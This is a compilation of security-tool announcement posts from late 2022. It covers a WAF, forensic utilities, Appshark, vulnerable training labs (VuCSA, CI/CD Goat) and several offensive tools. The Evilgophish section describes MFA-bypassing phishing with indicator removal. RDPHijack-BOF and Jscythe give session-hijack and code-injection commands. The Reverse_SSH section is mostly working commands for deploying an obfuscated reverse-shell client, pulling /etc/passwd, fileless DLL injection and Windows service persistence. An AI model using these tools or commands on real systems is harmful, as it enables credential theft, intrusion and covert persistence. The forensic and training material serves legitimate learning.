Port Service Remarks Credentials (If applicable)
8080 DVWA Where the WAF resides admin:password
5601 Elasticsearch To view logs elastic:changeme
8088 Admin Dashboard Dashboard to manage the WAF model
5001 Drupot Honeypot

To allow for Telegram live notifications, do replace the following variables in /waf/WafApp/waf.py with a valid TELEGRAM tokens.

WAF_NAME = 'Tester_WAF'
WARN_MSG = "ALERT [Security Incident] Malicious activity detected on " +WAF_NAME+ ". Please alert relevant teams and check through incident artifacts."
URL= "https://api.telegram.org/bot{}/sendMessage?chat_id={}&text={}".format(token,CHAT_ID,WARN_MSG)

Disclaimers & Other Considerations

NGWAF is a W.I.P, Open source project, functions and features may change from patch to patch. If you are interested to contribute, please feel free to create an issue or pull request!



GNU General Public License

RDPHijack-BOF - Cobalt Strike Beacon Object File (BOF) That Uses WinStationConnect API To Perform Local/Remote RDP Session Hijacking

By: Zion3R
9 November 2022 at 11:45

Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking. With a valid access token / kerberos ticket (e.g., golden ticket) of the session owner, you will be able to hijack the session remotely without dropping any beacon/tool on the target server.

To enumerate sessions locally/remotely, you could use Quser-BOF.


Usage: bof-rdphijack [your console session id] [target session id to hijack] [password|server] [argument]

Command Description
-------- -----------
password Specifies the password of the user who owns the session to which you want to connect.
server Specifies the remote server that you want to perform RDP hijacking.

Sample usage
Redirect session 2 to session 1 (require SYSTEM privilege):
bof-rdphijack 1 2

Redirect session 2 to session 1 with password of the user who owns the session 2 (require high integrity beacon):
bof-rdphijack 1 2 password [email protected]

Redirect session 2 to session 1 for a remote server (require token/ticket of the user who owns the session 2):
bof-rdphijack 1 2 server SQL01.lab.internal





Evilgophish - Evilginx2 + Gophish

By: Zion3R
7 November 2022 at 11:30

Combination of evilginx2 and GoPhish.


Before I begin, I would like to say that I am in no way bashing Kuba Gretzky and his work. I thank him personally for releasing evilginx2 to the public. In fact, without his work this work would not exist. I must also thank Jordan Wright for developing/maintaining the incredible GoPhish toolkit.


You should have a fundamental understanding of how to use GoPhish, evilginx2, and Apache2.


I shall not be responsible or liable for any misuse or illegitimate use of this software. This software is only to be used in authorized penetration testing or red team engagements where the operator(s) has(ve) been given explicit written permission to carry out social engineering.


As a penetration tester or red teamer, you may have heard of evilginx2 as a proxy man-in-the-middle framework capable of bypassing two-factor/multi-factor authentication. This is enticing to us to say the least, but when trying to use it for social engineering engagements, there are some issues off the bat. I will highlight the two main problems that have been addressed with this project, although some other bugs have been fixed in this version which I will highlight later.

  1. Lack of tracking - evilginx2 does not provide unique tracking statistics per victim (e.g. opened email, clicked link, etc.), this is problematic for clients who want/need/pay for these statistics when signing up for a social engineering engagement.
  2. Session overwriting with NAT and proxying - evilginx2 bases a lot of logic off of remote IP address and will whitelist an IP for 10 minutes after the victim triggers a lure path. evilginx2 will then skip creating a new session for the IP address if it triggers the lure path again (if still in the 10 minute window). This presents issues for us if our victims are behind a firewall all sharing the same public IP address, as the same session within evilginx2 will continue to overwrite with multiple victim's data, leading to missed and lost data. This also presents an issue for our proxy setup, since localhost is the only IP address requesting evilginx2.


In this setup, GoPhish is used to send emails and provide a dashboard for evilginx2 campaign statistics, but it is not used for any landing pages. Your phishing links sent from GoPhish will point to an evilginx2 lure path and evilginx2 will be used for landing pages. This provides the ability to still bypass 2FA/MFA with evilginx2, without losing those precious stats. Apache2 is simply used as a proxy to the local evilginx2 server and an additional hardening layer for your phishing infrastructure. Realtime campaign event notifications have been provided with a local websocket/http server I have developed and full usable JSON strings containing tokens/cookies from evilginx2 are displayed directly in the GoPhish GUI (and feed):

Infrastructure Layout

  • evilginx2 will listen locally on port 8443
  • GoPhish will listen locally on port 8080 and 3333
  • Apache2 will listen on port 443 externally and proxy to local evilginx2 server
    • Requests will be filtered at Apache2 layer based on redirect rules and IP blacklist configuration
      • Redirect functionality for unauthorized requests is still baked into evilginx2 if a request hits the evilginx2 server


setup.sh has been provided to automate the needed configurations for you. Once this script is run and you've fed it the right values, you should be ready to get started. Below is the setup help (note that certificate setup is based on letsencrypt filenames):

Redirect rules have been included to keep unwanted visitors from visiting the phishing server as well as an IP blacklist. The blacklist contains IP addresses/blocks owned by ProofPoint, Microsoft, TrendMicro, etc. Redirect rules will redirect known "bad" remote hostnames as well as User-Agent strings.


In case you ran setup.sh once and already replaced the default RId value throughout the project, replace_rid.sh was created to replace the RId value again.

./replace_rid <previous rid> <new rid>
- previous rid - the previous rid value that was replaced
- new rid - the new rid value to replace the previous
./replace_rid.sh user_id client_id

Email Campaign Setup

Once setup.sh is run, the next steps are:

  1. Start GoPhish and configure email template, email sending profile, and groups
  2. Start evilginx2 and configure phishlet and lure (must specify full path to GoPhish sqlite3 database with -g flag)
  3. Ensure Apache2 server is started
  4. Launch campaign from GoPhish and make the landing URL your lure path for evilginx2 phishlet

SMS Campaign Setup

An entire reworking of GoPhish was performed in order to provide SMS campaign support with Twilio. Your new evilgophish dashboard will look like below:

Once you have run setup.sh, the next steps are:

  1. Configure SMS message template. You will use Text only when creating a SMS message template, and you should not include a tracking link as it will appear in the SMS message. Leave Envelope Sender and Subject blank like below:

  1. Configure SMS Sending Profile. Enter your phone number from Twilio, Account SID, Auth Token, and delay in between messages into the SMS Sending Profiles page:

  1. Import groups. The CSV template values have been kept the same for compatibility, so keep the CSV column names the same and place your target phone numbers into the Email column. Note that Twilio accepts the following phone number formats, so they must be in one of these three:

  1. Start evilginx2 and configure phishlet and lure (must specify full path to GoPhish sqlite3 database with -g flag)
  2. Ensure Apache2 server is started
  3. Launch campaign from GoPhish and make the landing URL your lure path for evilginx2 phishlet

Live Feed Setup

Realtime campaign event notifications are handled by a local websocket/http server and live feed app. To get setup:

  1. Select true for feed bool when running setup.sh

  2. cd into the evilfeed directory and start the app with ./evilfeed

  3. When starting evilginx2, supply the -feed flag to enable the feed. For example:

./evilginx2 -feed -g /opt/evilgophish/gophish/gophish.db

  1. You can begin viewing the live feed at: http://localhost:1337/. The feed dashboard will look like below:


  • The live feed page hooks a websocket for events with JavaScript and you DO NOT need to refresh the page. If you refresh the page, you will LOSE all events up to that point.

Phishlets Surprise

Included in the evilginx2/phishlets folder are three custom phishlets not included in evilginx2.

  1. o3652 - modified/updated version of the original o365 (stolen from Optiv blog)
  2. google - updated from previous examples online (has issues, don't use in live campaigns)
  3. knowbe4 - custom (don't have access to an account for testing auth URL, works for single-factor campaigns, have not fully tested MFA)

A Word About Phishlets

I feel like the world has been lacking some good phishlet examples lately. It would be great if this repository could be a central repository for the latest phishlets. Send me your phishlets at [email protected] for a chance to end up in evilginx2/phishlets. If you provide quality work, I will create a Phishlets Hall of Fame and you will be added to it.

Changes To evilginx2

  1. All IP whitelisting functionality removed, new proxy session is established for every new visitor that triggers a lure path regardless of remote IP
  2. Fixed issue with phishlets not extracting credentials from JSON requests
  3. Further "bad" headers have been removed from responses
  4. Added logic to check if mime type was failed to be retrieved from responses
  5. All X headers relating to evilginx2 have been removed throughout the code (to remove IOCs)

Changes to GoPhish

  1. All X headers relating to GoPhish have been removed throughout the code (to remove IOCs)
  2. Custom 404 page functionality, place a .html file named 404.html in templates folder (example has been provided)
  3. Default rid string in phishing URLs is chosen by the operator in setup.sh
  4. Transparency endpoint and messages completely removed
  5. Added SMS Campaign Support


See the CHANGELOG.md file for changes made since the initial release.

Issues and Support

I am taking the same stance as Kuba Gretzky and will not help creating phishlets. There are plenty of examples of working phishlets and for you to create your own, if you open an issue for a phishlet it will be closed. I will also not consider issues with your Apache2, DNS, or certificate setup as legitimate issues and they will be closed. However, if you encounter a legitimate failure/error with the program, I will take the issue seriously.

Future Goals

  • Additions to IP blacklist and redirect rules
  • Add more phishlets


I would like to see this project improve and grow over time. If you have improvement ideas, new redirect rules, new IP addresses/blocks to blacklist, phishlets, or suggestions, please email me at: [email protected] or open a pull request.

Collect-MemoryDump - Automated Creation Of Windows Memory Snapshots For DFIR

By: Zion3R
6 November 2022 at 11:30

Collect-MemoryDump - Automated Creation of Windows Memory Snapshots for DFIR

Collect-MemoryDump.ps1 is PowerShell script utilized to collect a Memory Snapshot from a live Windows system (in a forensically sound manner).


  • Checks for Hostname and Physical Memory Size before starting memory acquisition
  • Checks if you have enough free disk space to save memory dump file
  • Collects a Raw Physical Memory Dump w/ DumpIt, Magnet Ram Capture, Belkasoft Live RAM Capturer and WinPMEM
  • Collects a Microsoft Crash Dump w/ DumpIt for Comae Beta from Magnet Idea Lab
  • Pagefile Collection w/ CyLR - Live Response Collection tool by Alan Orlikoski and Jason Yegge
  • Checks for Encrypted Volumes w/ Magnet Forensics Encrypted Disk Detector
  • Collects BitLocker Recovery Key
  • Checks for installed Endpoint Security Tools (AntiVirus and EDR)
  • Enumerates all necessary information from the target host to enrich your DFIR workflow
  • Creates a password-protected Secure Archive Container (PW: IncidentResponse)

First Public Release

MAGNET Talks - Frankfurt, Germany (July 27, 2022)
Presentation Title: Modern Digital Forensics and Incident Response Techniques


Download the latest version of Collect-MemoryDump from the Releases section.

Note: Collect-MemoryDump does not include all external tools by default.

You have to download following dependencies:

Copy the required files to following file locations:

Belkasoft Live RAM Capturer


MAGNET Encrypted Disk Detector

MAGNET Ram Capture


.\Collect-MemoryDump.ps1 [-Tool] [--Pagefile]

Example 1 - Raw Physical Memory Snapshot
.\Collect-MemoryDump.ps1 -DumpIt

Example 2 - Microsoft Crash Dump (.zdmp) β†’ optimized for uploading to Comae Investigation Platform
.\Collect-MemoryDump.ps1 -Comae

Note: You can uncompress *.zdmp files generated by DumpIt w/ Z2Dmp (Comae-Toolkit).

Example 3 - Raw Physical Memory Snapshot and Pagefile Collection β†’ MemProcFS
.\Collect-MemoryDump.ps1 -WinPMEM --Pagefile

Fig 1: Help Message

Fig 2: Check Available Space

Fig 3: Automated Creation of Windows Memory Snapshot w/ DumpIt

Fig 4: Automated Creation of Windows Memory Snapshot w/ Magnet RAM Capture

Fig 5: Automated Creation of Windows Memory Snapshot w/ WinPMEM

Fig 6: Automated Creation of Windows Memory Snapshot w/ Belkasoft Live RAM Capturer

Fig 7: Automated Creation of Windows Memory Snapshot w/ DumpIt (Microsoft Crash Dump)

Fig 8: Automated Creation of Windows Memory Snapshot w/ WinPMEM and Pagefile Collection w/ CyLR

Fig 9: Message Box

Fig 10: Secure Archive Container (PW: IncidentResponse) and Logfile.txt

Fig 11: Output Directories

Fig 12: Memory Directories (WinPMEM and Pagefile)

Fig 13: Memory Snapshot (in a forensically sound manner)

Fig 14: Pagefile Collection

Fig 15: Collected System Information


7-Zip 22.01 Standalone Console (2022-07-15)

Belkasoft Live RAM Capturer (2018-10-22)

DumpIt 3.5.0 (2022-08-02) β†’ Comae-Toolkit

CyLR 3.0 (2021-02-03)

Magnet Encrypted Disk Detector v3.1.0 (2022-06-19)

Magnet RAM Capture v1.2.0 (2019-07-24)

PsLoggedOn v1.35 (2016-06-29)

WinPMEM 4.0 RC2 (2020-10-12)


Belkasoft Live RAM Capturer
Comae-Toolkit incl. DumpIt
CyLR - Live Response Collection Tool
MAGNET Encrypted Disk Detector
MAGNET Ram Capture

MAGNET Idea Lab - Apply To Join

Prefetch-Hash-Cracker - A Small Util To Brute-Force Prefetch Hashes

By: Zion3R
5 November 2022 at 11:30


During the forensic analysis of a Windows machine, you may find the name of a deleted prefetch file. While its content may not be recoverable, the filename itself is often enough to find the full path of the executable for which the prefetch file was created.

Using the tool

The following fields must be provided:

  • Executable name
    Including the extension. It will be embedded in the prefetch filename, unless this happens.

  • Prefetch hash
    8 hexadecimal digits at the end of the prefetch filename, right before the .pf extension.

  • Hash function

  • Bodyfile

  • Mount point

Hash function

There are 3 known prefetch hash functions:

    Used in Windows XP

  • SCCA Vista
    Used in Windows Vista and Windows 10

  • SCCA 2008
    Used in Windows 7, Windows 8 and Windows 8.1


A bodyfile of the volume the executable was executed from.

The bodyfile format is not very restrictive, so there are a lot of variations of it - some of which are not supported. Body files created with fls and MFTECmd should work fine.

Mount point

The mount point of the bodyfile, as underlined below:

0|C:/Users/Peter/Desktop ($FILE_NAME)|62694-48-2|d/d-wx-wx-wx|...

How does it work?

The provided bodyfile is used to get the path of every folder on the volume. The tool appends the provided executable name to each of those paths to create a list of possible full paths for the executable. Each possible full path is then hashed using the provided hash function. If there's a possible full path for which the result matches the provided hash, that path is outputted.


The following cases are not supported:

  • Hosting applications, such as svchost.exe and mmc.exe
  • Applications executed with the /prefetch:# flag
  • Applications executed from a UNC (network) path

The 29-character limit

If the executable name is longer than 29 characters (including the extension), it will be truncated in the prefetch filename. For example, executing this file:

This is a very long file nameSo this part will be truncated.exe

From the C:\Temp directory on a Windows 10 machine, will result in the creation of this prefetch file:


In this case, the executable name cannot be derived from the prefetch filename, so you will not be able to provide it to the tool.



Appshark - Static Taint Analysis Platform To Scan Vulnerabilities In An Android App

By: Zion3R
4 November 2022 at 11:30

Appshark is a static taint analysis platform to scan vulnerabilities in an Android app.


Appshark requires a specific version of JDK -- JDK 11. After testing, it does not work on other LTS versions, JDK 8 and JDK 16, due to the dependency compatibility issue.

Building/Compiling AppShark

We assume that you are working in the root directory of the project repo. You can build the whole project with the gradle tool.

$ ./gradlew build  -x test 

After executing the above command, you will see an artifact file AppShark-0.1.1-all.jar in the directory build/libs.

Running AppShark

Like the previous step, we assume that you are still in the root folder of the project. You can run the tool with

$ java -jar build/libs/AppShark-0.1.1-all.jar  config/config.json5

The config.json5 has the following configuration contents.

"apkPath": "/Users/apks/app1.apk",
"out": "out",
"rules": "unZipSlip.json",
"maxPointerAnalyzeTime": 600

Each JSON field is explained below.

  • apkPath: the path of the apk file to analyze
  • out: the path of the output directory
  • rules: the path(s) of the rule file(s), can be more than 1 rules
  • maxPointerAnalyzeTime: the timeout duration in seconds set for the analysis started from an entry point
  • debugRule: specify the rule name that enables logging for debugging

If you provide a configuration JSON file which sets the output path as out in the project root directory, you will find the result file out/results.json after running the analysis.

Interpreting the Results

Below is an example of the results.json.

"AppInfo": {
"AppName": "test",
"PackageName": "net.bytedance.security.app",
"min_sdk": 17,
"target_sdk": 28,
"versionCode": 1000,
"versionName": "1.0.0"
"SecurityInfo": {
"FileRisk": {
"unZipSlip": {
"category": "FileRisk",
"detail": "",
"model": "2",
"name": "unZipSlip",
"possibility": "4",
"vulners": [
"details": {
"position": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>",
"Sink": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r31",
"entryMethod": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void f()>",
"Source": "<net.byte dance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r3",
"url": "/Volumes/dev/zijie/appshark-opensource/out/vuln/1-unZipSlip.html",
"target": [
"<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r3",
"pf{obj{<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>:35=>java.lang.StringBuilder}(unknown)->@data}",
"<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r11",
"<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r31"
"hash": "ec57a2a3190677ffe78a0c8aaf58ba5aee4d 2247",
"possibility": "4"
"details": {
"position": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>",
"Sink": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r34",
"entryMethod": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void f()>",
"Source": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r3",
"url": "/Volumes/dev/zijie/appshark-opensource/out/vuln/2-unZipSlip.html",
"target": [
"<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r3",
"pf{obj{<net.bytedance.security.a pp.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>:33=>java.lang.StringBuilder}(unknown)->@data}",
"<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r14",
"<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r34"
"hash": "26c6d6ee704c59949cfef78350a1d9aef04c29ad",
"possibility": "4"
"wiki": "",
"deobfApk": "/Volumes/dev/zijie/appshark-opensource/app.apk"
"DeepLinkInfo": {
"JsBridgeInfo": [
"BasicInfo": {
"ComponentsInfo": {
"JSNativeInterface": [
"UsePermissions": [
"DefinePermis sions": {
"Profile": "/Volumes/dev/zijie/appshark-opensource/out/vuln/3-profiler.json"

VuCSA - Vulnerable Client-Server Application - Made For Learning/Presenting How To Perform Penetration Tests Of Non-Http Thick Clients

By: Zion3R
3 November 2022 at 11:30

Vulnerable Client-Server Application

Vulnerable client-server application (VuCSA) is made for learning/presenting how to perform penetration tests of non-http thick clients. It is written in Java (with JavaFX graphical user interface).

Currently the vulnerable application contains the following challenges:

  1. Buffer Over-read (simulated)
  2. Command Execution
  3. SQL Injection
  4. Enumeration
  5. XML
  6. Horizontal Access Control
  7. Vertical Access Control

If you want to know how to solve these challenges, take a look at the PETEP website, which describes how to use the open-source tool PETEP to exploit them.

Tip: Before you start hacking, do not forget to check the data structure of messages bellow.

How to Run

In order to run the vulnerable server and client, you can use one of releases on GitHub or run gradle assemble, which creates distribution packages (for both Windows and Unix). These packages contain sh/bat scripts that will run the server and client using JVM.

Project Structure

Project is divided into three modules:

  • vucsa-common - common functionality for both client and server (including protocol processing utilities)
  • vucsa-client - vulnerable client with JavaFX GUI
  • vucsa-server - vulnerable server for terminal use

Data Structure

Messages transmitted between server and client have the following simple format:

32b 32b 32b ???

These four parts have the following meaning:

  • type - type of the message (used for serialization/deserialization)
  • target - target handler that will receive the message
  • length - length of the payload
  • payload - data serialized into bytes

Jscythe - Abuse The Node.Js Inspector Mechanism In Order To Force Any Node.Js/Electron/V8 Based Process To Execute Arbitrary Javascript Code

By: Zion3R
2 November 2022 at 11:30

jscythe abuses the node.js inspector mechanism in order to force any node.js/electron/v8 based process to execute arbitrary javascript code, even if their debugging capabilities are disabled.

Tested and working against Visual Studio Code, Discord, any Node.js application and more!


  1. Locate the target process.
  2. Send SIGUSR1 signal to the process, this will enable the debugger on a port (depending on the software, sometimes it's random, sometimes it's not).
  3. Determine debugging port by diffing open ports before and after sending SIGUSR1.
  4. Get the websocket debugging URL and session id from http://localhost:<port>/json.
  5. Send a Runtime.evaluate request with the provided code.
  6. Profit.


cargo build --release


Target a specific process and execute a basic expression:

./target/debug/jscythe --pid 666 --code "5 - 3 + 2"

Execute code from a file:

./target/debug/jscythe --pid 666 --script example_script.js

The example_script.js can require any node module and execute any code, like:

require('child_process').spawnSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator', { encoding : 'utf8' }).stdout

Search process by expression:

./target/debug/jscythe --search extensionHost --script example_script.js

Other options

Run jscythe --help for the complete list of options.


This project is made with β™₯ by @evilsocket and it is released under the GPL3 license.

Cicd-Goat - A Deliberately Vulnerable CI/CD Environment

By: Zion3R
1 November 2022 at 11:30

Deliberately vulnerable CI/CD environment. Hack CI/CD pipelines, capture the flags.

Created by Cider Security.


The CI/CD Goat project allows engineers and security practitioners to learn and practice CI/CD security through a set of 10 challenges, enacted against a real, full blown CI/CD environment. The scenarios are of varying difficulty levels, with each scenario focusing on one primary attack vector.

The challenges cover the Top 10 CI/CD Security Risks, including Insufficient Flow Control Mechanisms, PPE (Poisoned Pipeline Execution), Dependency Chain Abuse, PBAC (Pipeline-Based Access Controls), and more.
The different challenges are inspired by Alice in Wonderland, each one is themed as a different character.

The project’s environment is based on Docker images and can be run locally. These images are:

  1. Gitea (minimal git server)
  2. Jenkins
  3. Jenkins agent
  4. LocalStack (cloud service emulator that runs in a single container)
  5. Lighttpd
  6. CTFd (Capture The Flag framework).

The images are configured to interconnect in a way that creates fully functional pipelines.

Download & Run

There's no need to clone the repository.

Linux & Mac

curl -o cicd-goat/docker-compose.yaml --create-dirs https://raw.githubusercontent.com/cider-security-research/cicd-goat/main/docker-compose.yaml
cd cicd-goat && docker-compose up -d

Windows (Powershell)

mkdir cicd-goat; cd cicd-goat
curl -o docker-compose.yaml https://raw.githubusercontent.com/cider-security-research/cicd-goat/main/docker-compose.yaml
get-content docker-compose.yaml | %{$_ -replace "bridge","nat"}
docker-compose up -d



  • Spoiler alert! Avoid browsing the repository files as they contain spoilers.
  • To configure your git client for accessing private repositories we suggest cloning using the http url.
  • In each challenge, find the flag - in the format of flag# (e.g flag2), or another format if mentioned specifically.
  • Each challenge stands on its own. Do not use access gained in one challenge to solve another challenge.
  • If needed, use the hints on CTFd.
  • There is no need to exploit CVEs.
  • No need to hijack admin accounts of Gitea or Jenkins (named "admin" or "red-queen").

Take the challenge

  1. After starting the containers, it might take up to 5 minutes until the containers configuration process is complete.

  2. Login to CTFd at http://localhost:8000 to view the challenges:

    • Username: alice
    • Password: alice
  3. Hack:

  4. Insert the flags on CTFd and find out if you got it right.


  • If Gitea shows a blank page, refresh the page.
  • When forking a repository, don't change the name of the forked repository.


Warning: Spoilers!


See Solutions.



  1. Clone the repository.

  2. Rename .git folders to make them usable:

    python3 rename.py git
  3. Install testing dependencies:

    pip3 install pipenv==2022.8.30
    pipenv install --deploy
  4. Run the development environment to experiment with new changes:

    rm -rf tmp tmp-ctfd/
    cp -R ctfd/data/ tmp-ctfd/
    docker-compose -f docker-compose-dev.yaml up -d
  5. Make the desired changes:

    • All services except CTFd are completely configured as code so desired changes should be made to the files in the appropriate folders.
    • To make changes in CTFd, use the admin credentials.
  6. Shutdown the environment, move changes made in CTFd and rebuild it:

    docker-compose -f docker-compose-dev.yaml down
    ./apply.sh # save CTFd changes
    docker-compose -f docker-compose-dev.yaml up -d --build
  7. Run tests:

    pytest tests/
  8. Rename .git folders to allow push:

    python3 rename.py notgit
  9. Commit and push!


Follow the checklist below to add a challenge:

  1. CTFd:
    1. Write challenge description.
    2. Choose category according to difficulty level.
    3. Make sure the challenge is visible and has value according to difficulty.
    4. Write hints in order of usage.
    5. Add a flag. Make sure to select if it's case-insensitive.
  2. Gitea:
    1. Configure a new repository in gitea.yaml.
    2. Create the repository under gitea/repositories. Use an open-source repository that use the MIT license as a template for the challenge repository.
  3. Jenkins:
    1. Configure Jenkins and add new jobdsl files in the casc.yaml file.
    2. Make sure jobs don't run periodically. Jobs should be triggered by events / polling.
    3. Validate that the new challenge doesn't interfere with other challenges.
  4. Make sure the flag is not accessible when solving other challenges.
  5. Write tests.
  6. Write the solution.
  7. Update README.md if needed.
  8. In order to run the CI, make sure you have a CircleCI account and that you’ve clicked β€œSet Up Project” on your fork of the project.

Reverse_SSH - SSH Based Reverse Shell

By: Zion3R
31 October 2022 at 11:30

Want to use SSH for reverse shells? Now you can.

  • Manage and connect to reverse shells with native SSH syntax
  • Dynamic, local and remote forwarding
  • Native SCP and SFTP implementations for retrieving files from your targets
  • Full windows shell
  • Mutual client & server authentication to create high trust control channels
    And more!
                    +----------------+                 +---------+
| | | |
| | +---------+ RSSH |
| Reverse | | | Client |
| SSH server | | | |
| | | +---------+
+---------+ | | |
| | | | |
| Human | SSH | | SSH | +---------+
| Client +-------->+ <-----------------+ |
| | | | | | RSSH |
+---------+ | | | | Client |
| | | | |
| | | +---------+
| | |
| | |
+----------------+ | +---------+
| | |
| | RSSH |
+---------+ Client |
| |




docker run -p3232:2222 -e EXTERNAL_ADDRESS=<your_external_address>:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_ed25519.pub)" -v data:/data reversessh/reverse_ssh


git clone https://github.com/NHAS/reverse_ssh

cd reverse_ssh

cd bin/

# start the server
cp ~/.ssh/id_ed25519.pub authorized_keys


# copy client to your target then connect it to the server
./client your.rssh.server.com:3232

# Get help text
ssh your.rssh.server.com -p 3232 help

# See clients
ssh your.rssh.server.com -p 3232 ls -t

| ID | Hostname | IP Address |
| 0f6ffecb15d75574e5e955e014e0546f6e2851ac | root.wombo | [::1]:45150 |

# Connect to full shell
ssh -J your.rssh.server.com:3232 0f6ffecb15d75574e5e955e014e0546f6e2851ac

# Or using hostname

ssh -J your.rssh.server.com:3232 root.wombo

Setup Instructions

NOTE: reverse_ssh requires Go 1.17 or higher. Please check you have at least this version via go version

The simplest build command is just:


Make will build both the client and server binaries. It will also generate a private key for the client, and copy the corresponding public key to the authorized_controllee_keys file to enable the reverse shell to connect.

Golang allows your to effortlessly cross compile, the following is an example for building windows:

GOOS=windows GOARCH=amd64 make client # will create client.exe

You will need to create an authorized_keys file much like the ssh http://man.he.net/man5/authorized_keys, this contains your public key. This will allow you to connect to the RSSH server.

Alternatively, you can use the --authorizedkeys flag to point to a file.

cp ~/.ssh/id_ed25519.pub authorized_keys
./server #Set the server to listen on port 3232

Put the client binary on whatever you want to control, then connect to the server.

./client your.rssh.server.com:3232

You can then see what reverse shells have connected to you using ls:

ssh your.rssh.server.com -p 3232 ls -t
| ID | Hostname | IP Address |
| 0f6ffecb15d75574e5e955e014e0546f6e2851ac | root.wombo | [::1]:45150 |

Then typical ssh commands work, just specify your rssh server as a jump host.

# Connect to full shell
ssh -J your.rssh.server.com:3232 root.wombo

# Run a command without pty
ssh -J your.rssh.server.com:3232 root.wombo help

# Start remote forward
ssh -R 1234:localhost:1234 -J your.rssh.server.com:3232 root.wombo

# Start dynamic forward
ssh -D 9050 -J your.rssh.server.com:3232 root.wombo

scp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .

sftp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .

Fancy Features

Default Server

Specify a default server at build time:

$ RSSH_HOMESERVER=your.rssh.server.com:3232 make

# Will connect to your.rssh.server.com:3232, even though no destination is specified
$ bin/client

# Behaviour is otherwise normal; will connect to the supplied host, e.g example.com:3232
$ bin/client example.com:3232

Built in Web Server

The RSSH server can also run an HTTP server on the same port as the RSSH server listener which serves client binaries. The server must be placed in the project bin/ folder, as it needs to find the client source.

fingerprint will default to server public key --upx Use upx to compress the final binary (requires upx to be installed) --garble Use garble to obfuscate the binary (requires garble to be installed) # Build a client binary catcher$ link --name test http://your.rssh.server.com:3232/test " dir="auto">
./server --webserver :3232

# Generate an unnamed link
ssh your.rssh.server.com -p 3232

catcher$ link -h

link [OPTIONS]
Link will compile a client and serve the resulting binary on a link which is returned.
This requires the web server component has been enabled.
-t Set number of minutes link exists for (default is one time use)
-s Set homeserver address, defaults to server --external_address if set, or server listen address if not.
-l List currently active download links
-r Remove download link
--goos Set the target build operating system (default to runtime GOOS)
--goarch Set the target build architecture (default to runtime GOARCH)
--name Set link name
--shared-object Generate shared object file
--fingerprint Set RSSH server fingerprint will default to server public key
--upx Use upx to compress the final binary (requires upx to be installed)
--garble Use ga rble to obfuscate the binary (requires garble to be installed)

# Build a client binary
catcher$ link --name test

Then you can download it as follows:

wget http://your.rssh.server.com:3232/test
chmod +x test

Windows DLL Generation

You can compile the client as a DLL to be loaded with something like Invoke-ReflectivePEInjection. This will need a cross compiler if you are doing this on linux, use mingw-w64-gcc.

CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER= make client_dll

When the RSSH server has the webserver enabled you can also compile it with the link command:

./server --webserver :3232

# Generate an unnamed link
ssh your.rssh.server.com -p 3232

catcher$ link --name windows_dll --shared-object --goos windows

Which is useful when you want to do fileless injection of the rssh client.

SSH Subsystem

The SSH ecosystem allowsy out define and call subsystems with the -s flag. In RSSH this is repurposed to provide special commands for platforms.


list Lists avaiable subsystem
sftp: Runs the sftp handler to transfer files


setgid: Attempt to change group
setuid: Attempt to change user


service: Installs or removes the rssh binary as a windows service, requires administrative rights


# Install the rssh binary as a service (windows only)
ssh -J your.rssh.server.com:3232 test-pc.user.test-pc -s service --install

Windows Service Integration

The client RSSH binary supports being run within a windows service and wont time out after 10 seconds. This is great for creating persistent management services.

Full Windows Shell Support

Most reverse shells for windows struggle to generate a shell environment that supports resizing, copying and pasting and all the other features that we're all very fond of. This project uses conpty on newer versions of windows, and the winpty library (which self unpacks) on older versions. This should mean that almost all versions of windows will net you a nice shell.


The RSSH server can send out raw HTTP requests set using the webhook command from the terminal interface.

First enable a webhook:

$ ssh your.rssh.server.com -p 3232
catcher$ webhook --on http://localhost:8080/

Then disconnect, or connect a client, this will when issue a POST request with the following format.

$ nc -l -p 8080
POST /rssh_webhook HTTP/1.1
Host: localhost:8080
User-Agent: Go-http-client/1.1
Content-Length: 165
Content-Type: application/json
Accept-Encoding: gzip



RSSH and SSH support creating tuntap interfaces that allow you to route traffic and create pseudo-VPN. It does take a bit more setup than just a local or remote forward (-L, -R), but in this mode you can send UDP and ICMP.

First set up a tun (layer 3) device on your local machine.

sudo ip tuntap add dev tun0 mode tun
sudo ip addr add dev tun0
sudo ip link set dev tun0 up

# This will defaultly route all non-local network traffic through the tunnel
sudo ip route add via dev tun0

Install a client on a remote machine, this will not work if you have your RSSH client on the same host as your tun device.

ssh -J your.rssh.server.com:3232 user.wombo -w 0:any

This has some limitations, it is only able to send UDP/TCP/ICMP, and not arbitrary layer 3 protocols. ICMP is best effort and may use the remote hosts ping tool, as ICMP sockets are privileged on most machines. This also does not support tap devices, e.g layer 2 VPN, as this would require administrative access.



To enable the --garble flag in the link command you must install garble, a system for obfuscating golang binaries. However the @latest release has a bug that causes panics with generic code.
If you are installing this manually use the following:

go install mvdan.cc/[email protected]

